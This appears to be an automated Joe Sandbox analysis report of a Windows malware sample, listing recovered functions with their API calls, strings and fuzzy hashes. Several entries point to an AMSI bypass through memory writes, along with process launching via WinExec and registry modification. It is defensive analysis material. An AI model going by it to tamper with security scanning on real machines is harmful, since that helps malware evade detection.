Instruction ID: baa1413854c80bd609a79b0296b4d43b93788a7389d6a89beb5983437b2f73c9
Opcode Fuzzy Hash: a7ece11de91c4ab0446c1ade9a8ad27dbe264446960c68d1d4fae13a8e03b693
Instruction Fuzzy Hash: C2B15776A053518FEB16CF28E880366BBE1FB85324F1C86AED44ECB3A5C7709451CB94

Function 02948704 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 35
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(amsi), ref: 0294870D

Part of subcall function 029480C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02948148,?,?,00000000,00000000,?,02948061,00000000,KernelBASE,00000000,00000000,02948088), ref: 0294810D
Part of subcall function 029480C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02948113
Part of subcall function 029480C0: GetProcAddress.KERNEL32(?,?), ref: 02948125

Part of subcall function 02947CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02947D6C

FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 0294876C

Strings

W, xrefs: 02948719
DllGetClassObject, xrefs: 02948732
amsi, xrefs: 02948708

Memory Dump Source

Source File: 00000000.00000002.1689237521.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true

Associated: 00000000.00000002.1689223092.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689322930.000000000295E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689425836.0000000002992000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A86000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A89000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2930000_yxU3AgeVTi.jbxd

Similarity

API ID: AddressLibraryProc$FreeHandleLoadMemoryModuleVirtualWrite
String ID: DllGetClassObject$W$amsi
API String ID: 941070894-2671292670
Opcode ID: 11f5db18c642fea49f7c2ea4e5a8c8b39c32702e42412ccd7aec0704e0d53d55
Instruction ID: f852d3e671e88c8df9492ee03ee24ff3beb8b86cd7464774fb0142a1a4d5c251
Opcode Fuzzy Hash: 11f5db18c642fea49f7c2ea4e5a8c8b39c32702e42412ccd7aec0704e0d53d55
Instruction Fuzzy Hash: 52F0685154C381B9E301E6748C45F4BBFCD5BD2224F048E5DF1E8562D2DA79D10587B7

Function 02931A8C Relevance: 7.7, APIs: 6, Instructions: 175
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000000,?), ref: 02931B17
Sleep.KERNEL32(0000000A,00000000,?), ref: 02931B31

Memory Dump Source

Source File: 00000000.00000002.1689237521.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true

Associated: 00000000.00000002.1689223092.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689322930.000000000295E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689425836.0000000002992000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A86000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A89000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2930000_yxU3AgeVTi.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 6f15244397fe6a54bd43f1a29580fdcb437660cc4fe890f3863593ec519b36a4
Instruction ID: 80dd8e571fb05e3a4cc1ca724cffe4fcc6784bf8444dac13684053cb6d464942
Opcode Fuzzy Hash: 6f15244397fe6a54bd43f1a29580fdcb437660cc4fe890f3863593ec519b36a4
Instruction Fuzzy Hash: 2F5104716052408FEB17CF6CD9847A6BBE4EF85314F2885AED44DCB2A6E770C845CBA1

Function 0294E72A Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 112
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 0294E86A

Strings

ScanBuffer, xrefs: 0294E7B3
OpenSession, xrefs: 0294E80C
Initialize, xrefs: 0294E75A

Memory Dump Source

Source File: 00000000.00000002.1689237521.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true

Associated: 00000000.00000002.1689223092.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689322930.000000000295E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689425836.0000000002992000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A86000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A89000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2930000_yxU3AgeVTi.jbxd

Similarity

API ID: CheckConnectionInternet
String ID: Initialize$OpenSession$ScanBuffer
API String ID: 3847983778-3852638603
Opcode ID: fb9cee301484b0e53ea42ca6fdbf6a919abf67740df9810b91f4f8090f0cb629
Instruction ID: b5f3dcd3929e1c7032001cc1f204f7fa5ef7b5d897eac7b28b9ec20ab392f7ed
Opcode Fuzzy Hash: fb9cee301484b0e53ea42ca6fdbf6a919abf67740df9810b91f4f8090f0cb629
Instruction Fuzzy Hash: CF41E571A10208AFEB02EBA4D881E9EB7FAFFD8710F225475E041A7385DE70AD018F51

Function 0294881C Relevance: 6.1, APIs: 4, Instructions: 65
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(00000000,00000000,02948903), ref: 02948850
GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02948903), ref: 02948860
GetProcAddress.KERNEL32(74B20000,00000000), ref: 02948879

Part of subcall function 02947CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02947D6C

FreeLibrary.KERNEL32(74B20000,00000000,02992388,Function_000065D8,00000004,02992398,02992388,000186A3,00000040,0299239C,74B20000,00000000,00000000,00000000,00000000,02948903), ref: 029488E3

Memory Dump Source

Source File: 00000000.00000002.1689237521.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true

Associated: 00000000.00000002.1689223092.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689322930.000000000295E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689425836.0000000002992000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A86000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A89000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2930000_yxU3AgeVTi.jbxd

Similarity

API ID: Library$AddressFreeHandleLoadMemoryModuleProcVirtualWrite
String ID:
API String ID: 1543721669-0
Opcode ID: 9ddf8c66d5f40985284cbaf3f842f339574e448692901135d161e2b8bc7b0f1f
Instruction ID: d88b9a72eb77c2993b0b45a410d0e9fc23e917013321d1a41d26f6d0184cad0f
Opcode Fuzzy Hash: 9ddf8c66d5f40985284cbaf3f842f339574e448692901135d161e2b8bc7b0f1f
Instruction Fuzzy Hash: 7B111F71F44708BBFB01FBB8DD06E5E77A9ABC5B20F510464BA04AB690DA749A008B59

Function 029485D4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62processCOMMON

Download Yara Rule

APIs

Part of subcall function 02948018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02948088,?,?,00000000,?,029479FE,ntdll,00000000,00000000,02947A43,?,?,00000000), ref: 02948056
Part of subcall function 02948018: GetModuleHandleA.KERNELBASE(?), ref: 0294806A

Part of subcall function 029480C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02948148,?,?,00000000,00000000,?,02948061,00000000,KernelBASE,00000000,00000000,02948088), ref: 0294810D
Part of subcall function 029480C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02948113
Part of subcall function 029480C0: GetProcAddress.KERNEL32(?,?), ref: 02948125

CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02948660

Strings

Kernel32, xrefs: 0294861F
CreateProcessAsUserW, xrefs: 029485ED

Memory Dump Source

Source File: 00000000.00000002.1689237521.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true

Associated: 00000000.00000002.1689223092.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689322930.000000000295E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689425836.0000000002992000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A86000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A89000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2930000_yxU3AgeVTi.jbxd

Similarity

API ID: HandleModule$AddressProc$CreateProcessUser
String ID: CreateProcessAsUserW$Kernel32
API String ID: 3130163322-2353454454
Opcode ID: 71676af9f9b396d19e93614372244e0d08263af113299c6b22ed2a34ab13c14c
Instruction ID: ff9ba2a2d1f33f2548212bfbb864c8306d1f38554ed70a4238ab1045ab903f56
Opcode Fuzzy Hash: 71676af9f9b396d19e93614372244e0d08263af113299c6b22ed2a34ab13c14c
Instruction Fuzzy Hash: 5E11C2B2644208BFDB81EFACDD41F9A37EDEB8CB10F524550FA08D7240DA34E9108B60

Function 02948406 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46processCOMMON

Download Yara Rule

APIs

Part of subcall function 02948018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02948088,?,?,00000000,?,029479FE,ntdll,00000000,00000000,02947A43,?,?,00000000), ref: 02948056
Part of subcall function 02948018: GetModuleHandleA.KERNELBASE(?), ref: 0294806A

Part of subcall function 029480C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02948148,?,?,00000000,00000000,?,02948061,00000000,KernelBASE,00000000,00000000,02948088), ref: 0294810D
Part of subcall function 029480C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02948113
Part of subcall function 029480C0: GetProcAddress.KERNEL32(?,?), ref: 02948125

WinExec.KERNEL32(?,?), ref: 02948470

Strings

WinExec, xrefs: 02948421
Kernel32, xrefs: 02948453

Memory Dump Source

Source File: 00000000.00000002.1689237521.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true

Associated: 00000000.00000002.1689223092.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689322930.000000000295E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689425836.0000000002992000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A86000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A89000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2930000_yxU3AgeVTi.jbxd

Similarity

API ID: HandleModule$AddressProc$Exec
String ID: Kernel32$WinExec
API String ID: 2292790416-3609268280
Opcode ID: 04533dd9615b21eba82b5cf337298dcd0d9bdf26813e456f9a68117d2899b3ef
Instruction ID: 859faa953ebd4a8a6c43a5cb15e45e0ab9cc3749c4765f1a1366f86acb37130d
Opcode Fuzzy Hash: 04533dd9615b21eba82b5cf337298dcd0d9bdf26813e456f9a68117d2899b3ef
Instruction Fuzzy Hash: 2301A435A44304BFE711EFB8DC42F6A77EDF788B20F928860F904D7640DA35AD009A21

Function 02948408 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45processCOMMON

Download Yara Rule

APIs

Part of subcall function 02948018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02948088,?,?,00000000,?,029479FE,ntdll,00000000,00000000,02947A43,?,?,00000000), ref: 02948056
Part of subcall function 02948018: GetModuleHandleA.KERNELBASE(?), ref: 0294806A

Part of subcall function 029480C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02948148,?,?,00000000,00000000,?,02948061,00000000,KernelBASE,00000000,00000000,02948088), ref: 0294810D
Part of subcall function 029480C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02948113
Part of subcall function 029480C0: GetProcAddress.KERNEL32(?,?), ref: 02948125

WinExec.KERNEL32(?,?), ref: 02948470

Strings

WinExec, xrefs: 02948421
Kernel32, xrefs: 02948453

Memory Dump Source

Source File: 00000000.00000002.1689237521.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true

Associated: 00000000.00000002.1689223092.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689322930.000000000295E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689425836.0000000002992000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A86000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A89000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2930000_yxU3AgeVTi.jbxd

Similarity

API ID: HandleModule$AddressProc$Exec
String ID: Kernel32$WinExec
API String ID: 2292790416-3609268280
Opcode ID: 3e7249d8c2a7eaf1658bebb3b3870c77865bbde629bceacc1ce1cd86d9f453c2
Instruction ID: 446d4d5233232eff651e9ace9014ffc3bd9ed768bebab5f8b41a63c5bf0b6783
Opcode Fuzzy Hash: 3e7249d8c2a7eaf1658bebb3b3870c77865bbde629bceacc1ce1cd86d9f453c2
Instruction Fuzzy Hash: 89F0A435A44304BFE711EFB8DC42F5A77EDF788B20F928860F904D7640DA35A9009A21

Function 02945BAC Relevance: 4.6, APIs: 3, Instructions: 105fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02945CF4,?,?,02943880,00000001), ref: 02945C08
GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02945CF4,?,?,02943880,00000001), ref: 02945C36

Part of subcall function 02937D10: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,02943880,02945C76,00000000,02945CF4,?,?,02943880), ref: 02937D5E

Part of subcall function 02937F18: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,02943880,02945C91,00000000,02945CF4,?,?,02943880,00000001), ref: 02937F37

GetLastError.KERNEL32(00000000,02945CF4,?,?,02943880,00000001), ref: 02945C9B

Part of subcall function 0293A6F8: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,0293C359,00000000,0293C3B3), ref: 0293A717

Memory Dump Source

Source File: 00000000.00000002.1689237521.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true

Associated: 00000000.00000002.1689223092.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689322930.000000000295E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689425836.0000000002992000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A86000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A89000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2930000_yxU3AgeVTi.jbxd

Similarity

API ID: CreateErrorFileLast$FormatFullMessageNamePath
String ID:
API String ID: 503785936-0
Opcode ID: cf3a0777d4361fcfee991aaebc4dd2bf686b48efeb391e3b051b90ff9ad46de7
Instruction ID: 2185a42a16c164c35c912b3b88602ed20f8099f06e081935dde72a180102c037
Opcode Fuzzy Hash: cf3a0777d4361fcfee991aaebc4dd2bf686b48efeb391e3b051b90ff9ad46de7
Instruction Fuzzy Hash: B7318470E043049FDB01EFA8C881BAEB7F6AF88314F918565E504A7380DB755E058FA5

Function 0294EAF2 Relevance: 4.6, APIs: 3, Instructions: 59registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,00000000,02A86914), ref: 0294EB38
RegSetValueExA.ADVAPI32(00000608,00000000,00000000,00000001,00000000,0000001C,00000000,0294EBA3), ref: 0294EB70
RegCloseKey.ADVAPI32(00000608,00000608,00000000,00000000,00000001,00000000,0000001C,00000000,0294EBA3), ref: 0294EB7B

Memory Dump Source

Source File: 00000000.00000002.1689237521.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true

Associated: 00000000.00000002.1689223092.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689322930.000000000295E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689425836.0000000002992000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A86000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A89000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2930000_yxU3AgeVTi.jbxd

Similarity

API ID: CloseOpenValue
String ID:
API String ID: 779948276-0
Opcode ID: 6a638a17145601f8034d078a2e61bda424ec423449f6a254db2b97a3f6975f67
Instruction ID: e7d6996a19615f0ffcb04bf897d46586d4b5182a9bc42d335575fd8ad0b9383a
Opcode Fuzzy Hash: 6a638a17145601f8034d078a2e61bda424ec423449f6a254db2b97a3f6975f67
Instruction Fuzzy Hash: E9110671A00204BFEB02EBA8DC81DAE7BEDEB89B10F524474B545D7290DA34EE418E65

Function 0294EAF4 Relevance: 4.6, APIs: 3, Instructions: 58registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,00000000,02A86914), ref: 0294EB38
RegSetValueExA.ADVAPI32(00000608,00000000,00000000,00000001,00000000,0000001C,00000000,0294EBA3), ref: 0294EB70
RegCloseKey.ADVAPI32(00000608,00000608,00000000,00000000,00000001,00000000,0000001C,00000000,0294EBA3), ref: 0294EB7B

Memory Dump Source

Source File: 00000000.00000002.1689237521.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true

Associated: 00000000.00000002.1689223092.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689322930.000000000295E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689425836.0000000002992000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A86000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A89000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2930000_yxU3AgeVTi.jbxd

Similarity

API ID: CloseOpenValue
String ID:
API String ID: 779948276-0
Opcode ID: 46b08889daa4dc4e0f95bade3d221ec0b25f5b7588f944e7d142ca5b7619e373
Instruction ID: c84b3a9d0741f4c6412cfedd09834918fb96a2023ef53e9dd5eeb89fbd7858e7
Opcode Fuzzy Hash: 46b08889daa4dc4e0f95bade3d221ec0b25f5b7588f944e7d142ca5b7619e373
Instruction Fuzzy Hash: 51110671A00204AFEB02EBA8DC81DAE7BEDEB89B10F524474B545D7290DA34EA418E65

Function 0293E2E4 Relevance: 4.5, APIs: 3, Instructions: 45COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 0293E2F3

Memory Dump Source

Source File: 00000000.00000002.1689237521.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true

Associated: 00000000.00000002.1689223092.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689322930.000000000295E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689425836.0000000002992000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A86000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A89000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2930000_yxU3AgeVTi.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 290471bfc05532c3008df19f5d2f2724b9fd34c14cb2d9f6d8a26a2317fba39c
Instruction ID: e23c7e834bffaeba36b4671743f8d965d7ee128decbdfb2707c6c306aca1f837
Opcode Fuzzy Hash: 290471bfc05532c3008df19f5d2f2724b9fd34c14cb2d9f6d8a26a2317fba39c
Instruction Fuzzy Hash: D8F09625B08210D7DB277B38CDC456E279A5F847117545836F4C6AB245CB34CC15CB62

Function 02934CFC Relevance: 4.5, APIs: 3, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(0294ED84), ref: 02934C1A
SysAllocStringLen.OLEAUT32(?,?), ref: 02934D07
SysFreeString.OLEAUT32(00000000), ref: 02934D19

Memory Dump Source

Source File: 00000000.00000002.1689237521.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true

Associated: 00000000.00000002.1689223092.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689322930.000000000295E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689425836.0000000002992000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A86000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A89000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2930000_yxU3AgeVTi.jbxd

Similarity

API ID: String$Free$Alloc
String ID:
API String ID: 986138563-0
Opcode ID: 5a5438c59bf50d5a9d2d1f0a3350fd82e771d5cb0ff699e6fe957ce0256f5644
Instruction ID: a9a1a68a9aad51483da87d1bfcb91dae3877a6cd53fb48b50f3c20ac24f32db8
Opcode Fuzzy Hash: 5a5438c59bf50d5a9d2d1f0a3350fd82e771d5cb0ff699e6fe957ce0256f5644
Instruction Fuzzy Hash: 4AE017B82052016EFF1B2F219C40B7B372EBFC2741B259899E804CA160DB78C841AE34

Function 0294705C Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 256COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(?), ref: 0294735A

Strings

H, xrefs: 02947111

Memory Dump Source

Source File: 00000000.00000002.1689237521.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true

Associated: 00000000.00000002.1689223092.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689322930.000000000295E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689425836.0000000002992000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A86000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A89000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2930000_yxU3AgeVTi.jbxd

Similarity

API ID: FreeString
String ID: H
API String ID: 3341692771-2852464175
Opcode ID: ba516b6e913ad4ce9be925dbde669e8bee2266ff7ebde5c311dce01c303886df
Instruction ID: 43d2c738070bcdd0044e4d4ac496838bbc846fabcfb9c43653fd96c00e6f95c4
Opcode Fuzzy Hash: ba516b6e913ad4ce9be925dbde669e8bee2266ff7ebde5c311dce01c303886df
Instruction Fuzzy Hash: 69B1C074A01608EFDB15CF99E880A9DFBF6FF89314F258569E805AB364DB30A845CF50

Function 0293E6E0 Relevance: 3.1, APIs: 2, Instructions: 63COMMON

Download Yara Rule

APIs

VariantCopy.OLEAUT32(00000000,00000000), ref: 0293E701

Part of subcall function 0293E2E4: VariantClear.OLEAUT32(?), ref: 0293E2F3

Memory Dump Source

Source File: 00000000.00000002.1689237521.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true

Associated: 00000000.00000002.1689223092.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689322930.000000000295E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689425836.0000000002992000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A86000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A89000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2930000_yxU3AgeVTi.jbxd

Similarity

API ID: Variant$ClearCopy
String ID:
API String ID: 274517740-0
Opcode ID: 4063bdad07027249390b0adbc52df10fe899399cc9ef4089f83567fdcb25f5b4
Instruction ID: 6fe1b3eaa5bef2774dcf1eafd7b2ede07d81d0fa6da6e31f753238b7548deaff
Opcode Fuzzy Hash: 4063bdad07027249390b0adbc52df10fe899399cc9ef4089f83567fdcb25f5b4
Instruction Fuzzy Hash: 1D11C420B0421897CB37AF69D8C4A6B77DAAFC67507045826FACB8B255DB30CC05CBA1

Function 0293E37C Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0293E3BC

Memory Dump Source

Source File: 00000000.00000002.1689237521.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true

Associated: 00000000.00000002.1689223092.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689322930.000000000295E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689425836.0000000002992000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A86000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A89000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2930000_yxU3AgeVTi.jbxd

Similarity

API ID: InitVariant
String ID:
API String ID: 1927566239-0
Opcode ID: 699ad0d65ac9ca9769394522584f396f755f1a1e2ae4dfe0be6a0408ea8e1199
Instruction ID: a751443f3b3664c0d33849af1deb376d1708e9165e137ea9bcfb9b3ac89aaddd
Opcode Fuzzy Hash: 699ad0d65ac9ca9769394522584f396f755f1a1e2ae4dfe0be6a0408ea8e1199
Instruction Fuzzy Hash: 08316F71A04208AFDB16DFA8C988AAE77EDFF4C314F444561F989D3240D334D991CBA5

Function 02946CEC Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(00000000,?,00000000,02946D39,?,?,?,00000000), ref: 02946D19

Part of subcall function 02934C0C: SysFreeString.OLEAUT32(0294ED84), ref: 02934C1A

Memory Dump Source

Source File: 00000000.00000002.1689237521.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true

Associated: 00000000.00000002.1689223092.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689322930.000000000295E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689425836.0000000002992000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A86000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1689567343.0000000002A89000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2930000_yxU3AgeVTi.jbxd

Similarity

API ID: FreeFromProgString
String ID:
API String ID: 4225568880-0
Opcode ID: 4a64336e5d3db75714748fe84a87af95aed2be55dbcc50c78ceb784ac909fa50
Instruction ID: 11a549b78af664068227edebf9f2fc140ae15225fcc113386f63cb84d54bd7bc
Opcode Fuzzy Hash: 4a64336e5d3db75714748fe84a87af95aed2be55dbcc50c78ceb784ac909fa50
Instruction Fuzzy Hash: 65E092B5604708BFE712FBA5CC52D9A77EEDFCAB10B520471F900D7640EE75AE008960

Function 02935814 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(02930000,?,00000105), ref: 02935832

Part of subcall function 02935A78: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02930000,0295E790), ref: 02935A94
Part of subcall function 02935A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02930000,0295E790), ref: 02935AB2
Part of subcall function 02935A78: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02930000,0295E790), ref: 02935AD0
